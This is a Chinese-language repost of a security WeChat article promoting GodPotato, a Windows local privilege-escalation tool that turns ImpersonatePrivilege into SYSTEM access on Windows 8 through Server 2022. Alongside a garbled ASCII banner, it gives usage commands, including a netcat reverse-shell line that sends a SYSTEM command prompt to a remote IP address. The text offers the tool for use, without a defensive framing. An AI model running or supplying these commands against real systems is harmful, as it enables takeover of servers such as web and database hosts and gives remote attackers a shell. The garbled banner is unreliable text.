来源:https://github.com/BeichenDream/GodPotato
基于Potato提权6年的历史,从RottenPotato开始到JuicyPotatoNG结束,我通过研究DCOM发现了一个新技术,可以在Windows 2012-Windows 2022中实现提权。
rpcss在处理oxid时存在一些缺陷,rpcss是系统必须开启的服务,因此它几乎可以在任何 Windows 操作系统上运行,我将其命名为 GodPotato。
现在只要你有” ImpersonatePrivilege”权限,那你就是“NT AUTHORITYSYSTEM”,通常WEB服务和数据库服务都有“ImpersonatePrivilege”权限。
受影响版本:
Windows8 - Windows 11Windows Server 2012 - Windows Server 2022
FFFFF FFF FFFFFFFFFFFFFF FFF FFFFFFFFFFF FFFF FFF FFF FFF FFF FFFFFF FFF FFF FFF FFF FFF FFFFFF FFF FFF FFF FFF FFF FFFFFFF FFFFFFF FFFFFFFF FFF FFF FFFFFFF FFFFFFFFF FFFFFF FFFFFFFFF FFFFFFFFFF FFFF FFFF FFF FFFF FFF FFFF FFFF FFFF FFF FFF FFF FFF FFF FFFFFFFF FFFFF FFF FFF FFF FFF FFFFFFFF FFF FFF FFF F FFF FFF FFF FFFFFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFF FFF FFF FFFFFFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFFFFF FFF FFF FFFFFFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFFF FFF FFF FFF FFFFFFFF FFFF FFFF FFF FFFF FFF FFF FFF FFFF FFF FFFF FFF FFF FFFF FFFFFFFFFFF FFFFFFF FFFFFFFF FFF FFFFFFF FFFFFF FFFFFFFF FFFFFFF FFFFFFFFFFFFFF FFFFF FFFFFFF FFF FFFFF FFFFF FFFFFFFF FFFF FFFFArguments:Required:True CommandLine (default cmd /c whoami)Example:GodPotato -cmd "cmd /c whoami"
使用程序内置的Clsid进行权限升级,执行一个简单的命令
GodPotato -cmd "cmd /c whoami"
定制Clsid和执行命令
GodPotato -cmd "cmd /c whoami"
执行反向的shell命令
GodPotato -cmd "nc -t -e C:WindowsSystem32cmd.exe 192.168.1.102 2012"原文始发于微信公众号(Khan安全攻防实验室):神兵利器丨GodPotato新版土豆提权
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论